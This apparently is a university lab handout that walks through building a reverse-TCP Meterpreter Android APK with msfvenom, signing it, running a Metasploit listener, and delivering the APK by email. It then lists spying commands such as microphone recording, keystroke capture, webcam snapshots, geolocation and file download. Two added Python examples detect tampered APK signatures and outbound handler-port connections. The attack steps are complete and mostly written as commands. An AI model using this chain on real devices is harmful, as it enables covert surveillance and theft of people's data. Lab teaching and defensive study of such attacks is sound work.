Final Project-Exploiting An Android Device

This document discusses exploiting an Android device using MSFvenom and Metasploit Framework. It involves 6 steps: 1. Set up Kali Linux and Android emulator VMs. 2. Use MSFvenom to generate a malicious APK file targeting the Android device. 3. Sign the APK file's certificate using keytool and jarsigner to allow installation. 4. Start a Metasploit listener to receive the payload. 5. Send the signed APK to the Android device and install it. 6. Use Meterpreter commands like sysinfo and screenshot on the compromised device.

Uploaded by

Kim Chan

Disclaimer

Please note that any material or activity related to cybersecurity or hacking provided here is intended solely for educational purposes. The purpose of this material is to increase awareness and understanding of cybersecurity concepts and principles. The activities described in this material should not be attempted outside of a controlled educational setting. Any attempt to engage in illegal or unethical activities related to cybersecurity could result in serious legal and ethical consequences. It is the responsibility of individuals to use this information in a responsible and ethical manner.

Exploiting an Android Device Using MSFvenom and Metasploit Framework

Objective: You will learn how to use MSFvenom and the Metasploit framework to exploit an Android mobile device. You will build the payload using MSFvenom, save it as an .apk file, and add a listener to the Metasploit system.

1. Create two VMs in VMware Workstation: Kali Linux and an Android emulator (LineageOS 14.1 R5).
Note: instead of the Android emulator you can use your personal device if you wish.

2. Creating a malicious APK (Android Package Kit file format):

In Kali, open the terminal and execute the following command to generate the malicious APK:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.230.132 LPORT=4444 R > android.apk

Note: Replace the LHOST value (192.168.230.132 above, written as <your-ip-address> in the breakdown below) with the Kali IP address.


An APK file (Android Package Kit file format) is the file format for applications used on the Android

msfvenom: Metasploit Framework tool for generating payloads.
-p android/meterpreter/reverse_tcp: Specifies the Android Meterpreter reverse TCP payload.
LHOST=<your-ip-address>: Sets the attacker's IP address for the connection.
LPORT=4444: Sets the port for the connection.
R: Specifies raw output format.
> android.apk: Redirects the output to an APK file named "android.apk".

Creating a malicious APK

Use this command to create an apk file:
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.230.132 LPORT=4444 R > android.apk

Use this command to verify the file was created:
ls -la

3. Signing the Certificate

Generate a Keystore for the android.apk file:

sudo keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

keytool: Java tool for managing cryptographic keys and certificates.
-genkey: Generates a new key pair and certificate.
-V: Enables verbose output for more detailed information.
-keystore key.keystore: Specifies the filename of the keystore file to be created (key.keystore).
-alias hacked: Sets an alias (identifier) for the key entry in the keystore (hacked).
-keyalg RSA: Specifies the algorithm to generate the key pair (RSA).
-keysize 2048: Sets the size of the key (2048 bits).
-validity 10000: Sets the validity period of the key pair in days (10000 days).

Install Jarsigner tool:


sudo apt-get install openjdk-11-jdk-headless

Jarsigner is a command-line tool used to digitally sign Java Archive (JAR) files, including APK files in the case of Android applications. Signing the APK file is crucial because it ensures the integrity and authenticity of the application. Android devices require a properly signed certificate for app installation; only signed APK files can be installed.

Sign the APK file using Jarsigner:


sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android.apk hacked

Verify if the application is signed:


sudo jarsigner -verify -verbose -certs android.apk

Install Zipalign tool:


sudo apt-get install zipalign

Zipalign is a tool used to optimize the alignment of resources in APK files. It ensures that all uncompressed data starts with a particular alignment relative to the start of the file. This optimization process improves the performance of the APK on Android devices by reducing memory usage.

Convert the .apk file with zipalign:


sudo zipalign -v 4 android.apk singed_jar.apk

zipalign: Android tool for optimizing APK files.
-v: Enables verbose output for more detailed information.
4: Specifies the alignment requirement (4-byte alignment).
android.apk: Specifies the input APK file to be aligned.
singed_jar.apk: Specifies the output aligned APK file.

Signing the Certificate

Generate a Keystore for the android.apk file:
sudo keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Install Jarsigner tool:
sudo apt-get install openjdk-11-jdk-headless
note: "download will take forever"

Sign the APK file using Jarsigner:
sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android.apk hacked

Verify if the application is signed:
sudo jarsigner -verify -verbose -certs android.apk

Install Zipalign tool:
sudo apt-get install zipalign

If the package is not found, edit the sources.list file with nano and add this line:
deb http://ftp.de.debian.org/debian buster main
Then update the Kali Linux package lists.

Convert the .apk file with zipalign:
sudo zipalign -v 4 android.apk singed_jar.apk
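To see what the jarsigner step above actually protects, here is an added example (not part of the handout, and not Metasploit or Android SDK code) that performs the integrity half of what `jarsigner -verify` does for the v1 (JAR-style) signature: it recomputes the per-entry digests recorded in META-INF/MANIFEST.MF and reports any entry that was modified after signing, any entry the manifest does not cover, and any use of the SHA-1 digest the handout selects with -digestalg SHA1 (deprecated; jarsigner itself warns about it). The APK it checks is constructed in memory with a placeholder .SF file; a real check would also verify the .SF digests and the PKCS#7 signature in the .RSA file, and modern APKs additionally carry v2/v3 signature blocks outside the zip entries, which this code does not look at.

```python
"""Recompute v1 (JAR) manifest digests inside an APK and flag tampering or
weak digest algorithms.  Added example: standard library only; the sample
APK is constructed in memory, not taken from the handout."""
import base64
import hashlib
import io
import zipfile

# Manifest attribute name -> hash constructor, as jarsigner writes them.
DIGEST_ALGOS = {"SHA1-Digest": hashlib.sha1, "SHA-256-Digest": hashlib.sha256}
WEAK_DIGESTS = {"SHA1-Digest"}


def parse_manifest(text):
    """Parse MANIFEST.MF into {entry_name: {attribute: value}}.
    Continuation lines (a leading space after a 72-byte wrap) are unfolded first;
    the nameless main section is discarded."""
    unfolded = text.replace("\r\n", "\n").replace("\n ", "")
    sections, current_name, current = {}, None, {}
    for line in unfolded.split("\n"):
        if not line:                      # blank line closes a section
            if current_name is not None:
                sections[current_name] = current
            current_name, current = None, {}
            continue
        key, _, value = line.partition(": ")
        if key == "Name":
            current_name = value
        else:
            current[key] = value
    if current_name is not None:
        sections[current_name] = current
    return sections


def check_apk_v1(apk_bytes):
    """Return a list of findings; an empty list means every manifest digest
    matched, every file is covered, and no weak digest algorithm was used."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        names = set(zf.namelist())
        if "META-INF/MANIFEST.MF" not in names:
            return ["no META-INF/MANIFEST.MF: APK carries no v1 signature"]
        if not any(n.startswith("META-INF/") and n.endswith(".SF") for n in names):
            findings.append("manifest present but no .SF signature file: unsigned")
        manifest = parse_manifest(zf.read("META-INF/MANIFEST.MF").decode("utf-8"))
        for entry, attrs in manifest.items():
            if entry not in names:
                findings.append(f"{entry}: listed in manifest but missing from archive")
                continue
            data = zf.read(entry)
            for attr, ctor in DIGEST_ALGOS.items():
                if attr not in attrs:
                    continue
                if attr in WEAK_DIGESTS:
                    findings.append(f"{entry}: weak digest algorithm {attr}")
                if ctor(data).digest() != base64.b64decode(attrs[attr]):
                    findings.append(f"{entry}: {attr} mismatch (content modified after signing)")
        for entry in sorted(names):       # files jarsigner never covered
            if entry.startswith("META-INF/") or entry.endswith("/"):
                continue
            if entry not in manifest:
                findings.append(f"{entry}: not covered by the manifest")
    return findings


def build_manifest(entries, digest_attr="SHA-256-Digest"):
    """Lay out a MANIFEST.MF the way jarsigner does (constructed here)."""
    ctor = DIGEST_ALGOS[digest_attr]
    lines = ["Manifest-Version: 1.0", "Created-By: example", ""]
    for name, data in entries.items():
        digest = base64.b64encode(ctor(data).digest()).decode("ascii")
        lines += [f"Name: {name}", f"{digest_attr}: {digest}", ""]
    return "\n".join(lines)


def build_apk(entries, digest_attr="SHA-256-Digest", signed=True, tamper=None):
    """Construct an APK-like zip with v1 metadata.  `tamper` maps an entry name
    to bytes written AFTER the manifest was computed, i.e. post-signing edits.
    The .SF here is a placeholder; a real one is produced by jarsigner."""
    manifest = build_manifest(entries, digest_attr)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        if signed:
            zf.writestr("META-INF/HACKED.SF", "Signature-Version: 1.0\n")
        for name, data in entries.items():
            zf.writestr(name, (tamper or {}).get(name, data))
    return buf.getvalue()


SAMPLE_ENTRIES = {  # constructed stand-ins for real APK contents
    "AndroidManifest.xml": b"<manifest package='com.example.lab'/>",
    "classes.dex": b"dex\n035\x00constructed-bytecode",
}


def demo():
    """Good build, SHA-1 build (as in the handout), and a post-signing edit."""
    good = check_apk_v1(build_apk(SAMPLE_ENTRIES))
    weak = check_apk_v1(build_apk(SAMPLE_ENTRIES, digest_attr="SHA1-Digest"))
    tampered = check_apk_v1(build_apk(SAMPLE_ENTRIES, tamper={"classes.dex": b"patched"}))
    return good, weak, tampered


if __name__ == "__main__":
    for label, findings in zip(("good", "sha1", "tampered"), demo()):
        print(label, findings or ["ok"])
```

Run it against a real file with `check_apk_v1(open("singed_jar.apk", "rb").read())`: a clean jarsigner output reports only the weak-digest findings for the SHA1 options used above, while any byte changed after signing shows up as a digest mismatch, which is exactly what the device's installer refuses.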

4. Setting up listener on Metasploit

Open Metasploit console:
sudo msfconsole

Load multi-handler exploit:
use exploit/multi/handler

Set up the reverse payload:
set payload android/meterpreter/reverse_tcp

Set LHOST and LPORT:
set LHOST 192.168.230.132
set LPORT 4444

Start the listener:
run

5. Send the malicious APK to the target machine

Send the file 'singed_jar.apk' to the victim's email (yourself in this project).

The victim downloads the singed_jar.apk file and installs it with 'Unknown sources' allowed on the Android device. Then, run the installed app. After the installation completes, return to the Kali machine, where the listener opens the Meterpreter session.

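From the defender's side, the moment the installed app runs is visible on the network as a device on the Wi-Fi segment opening a long-lived outbound TCP session to an unusual port (4444 in this lab). The added example below, which is not part of the handout and not Metasploit code, runs that detection logic over constructed flow records. The record layout, the 10.0.0.0/24 "device segment", the list of expected ports and the 300-second threshold are all assumptions chosen for the example; the handler port defaults to the one the handout's listener uses.

```python
"""Flag outbound flows from a device segment that look like a reverse-TCP
handler session.  Added example over constructed flow records; the segment,
port list and thresholds are assumptions, not values from the handout."""
import ipaddress

MOBILE_SEGMENT = ipaddress.ip_network("10.0.0.0/24")   # assumed: device Wi-Fi VLAN
EXPECTED_PORTS = {53, 80, 123, 443, 5228}              # 5228: Google push keep-alive
LONG_LIVED_S = 300                                      # an odd-port session this long stands out


def parse_flow(line):
    """Parse one constructed record: 'ts,src,sport,dst,dport,proto,duration_s,bytes_out'."""
    ts, src, sport, dst, dport, proto, dur, out = line.strip().split(",")
    return {
        "ts": ts,
        "src": ipaddress.ip_address(src), "sport": int(sport),
        "dst": ipaddress.ip_address(dst), "dport": int(dport),
        "proto": proto.lower(), "duration": int(dur), "bytes_out": int(out),
    }


def classify_flow(flow, handler_ports=frozenset({4444})):
    """Return a reason string if the flow looks like a device calling out to a
    reverse-TCP handler, else None.  `handler_ports` defaults to the lab's port;
    a production rule would take these from threat intel, not a constant."""
    if flow["src"] not in MOBILE_SEGMENT or flow["dst"] in MOBILE_SEGMENT:
        return None                       # only outbound traffic leaving the segment
    if flow["proto"] != "tcp":
        return None
    if flow["dport"] in handler_ports:
        return f"outbound TCP to known handler port {flow['dport']}"
    if flow["dport"] not in EXPECTED_PORTS and flow["duration"] >= LONG_LIVED_S:
        return f"long-lived ({flow['duration']}s) session to non-standard port {flow['dport']}"
    return None


def suspicious_flows(lines, handler_ports=frozenset({4444})):
    """Run classify_flow over raw lines; returns [(src, dst, dport, reason), ...]."""
    hits = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        flow = parse_flow(line)
        reason = classify_flow(flow, handler_ports)
        if reason:
            hits.append((str(flow["src"]), str(flow["dst"]), flow["dport"], reason))
    return hits


SAMPLE_FLOWS = [  # constructed records, not real telemetry
    "# ts,src,sport,dst,dport,proto,duration_s,bytes_out",
    "2024-05-01T10:00:00Z,10.0.0.15,51000,198.51.100.7,443,tcp,12,2048",
    "2024-05-01T10:02:10Z,10.0.0.15,51010,192.168.230.132,4444,tcp,1800,40960",
    "2024-05-01T10:05:00Z,10.0.0.22,52000,10.0.0.1,53,udp,1,120",
    "2024-05-01T10:06:00Z,10.0.0.22,52100,203.0.113.9,8443,tcp,900,70000",
    "2024-05-01T10:06:30Z,10.0.0.22,52101,203.0.113.9,443,tcp,900,70000",
    "2024-05-01T10:07:00Z,192.168.230.132,4444,10.0.0.15,51010,tcp,1800,40960",
]

if __name__ == "__main__":
    for hit in suspicious_flows(SAMPLE_FLOWS):
        print(*hit)
```

The port match is the cheap rule and the one an attacker changes first; the duration rule is what still fires when LPORT is set to something unremarkable, at the cost of also catching legitimate long sessions to unusual ports, so in practice it is tuned with an allow-list of known services rather than the short constant used here.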
6. Post-Exploitation Commands

Once a Meterpreter session is acquired on the Android device, execute only 10 commands from the following for further exploration:

- sysinfo: Display system information.
- check_root: Check if the device is rooted.
- record_mic: Record sounds on the victim's end.
- dump_calllog: Save the list of contacts in a text file (Note: Since the system is new, there may be no contacts initially).
- getuid: Get the user ID of the current user.
- shell: Gain a command shell on the device.
- download: Download a file from the target device to the attacker's machine.
- upload: Upload a file from the attacker's machine to the target device.
- screenshot: Take a screenshot of the target device's screen.
- webcam_list: List available webcams on the target device (if applicable).
- webcam_snap: Take a snapshot from the target device's webcam (if applicable).
- geolocate: Attempt to retrieve the geographical location of the target device.
- keyscan_start: Start capturing keystrokes entered on the target device's keyboard.
- keyscan_dump: Dump captured keystrokes.

Marking schema

Task                  Mark
Task 1                2
Task 2                3
Task 3                5
Task 4                5
Task 5                5
Task 6                10
Student engagement*   Excellent: 5 points / Good: 2 points / Poor: 0
Total                 40

*Student engagement includes:

- Active Participation: Is the student actively engaged in discussions, asking questions, and providing answers or contributions?
- Frequency: How often does the student participate? Are they consistently engaged throughout the session?
- Quality of Contributions: Are the student's contributions thoughtful, relevant, and constructive?
- Engagement with Peers: Does the student interact with their classmates, providing feedback, encouragement, or assistance when needed?

Links

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b
https://www.osboxes.org/android-x86/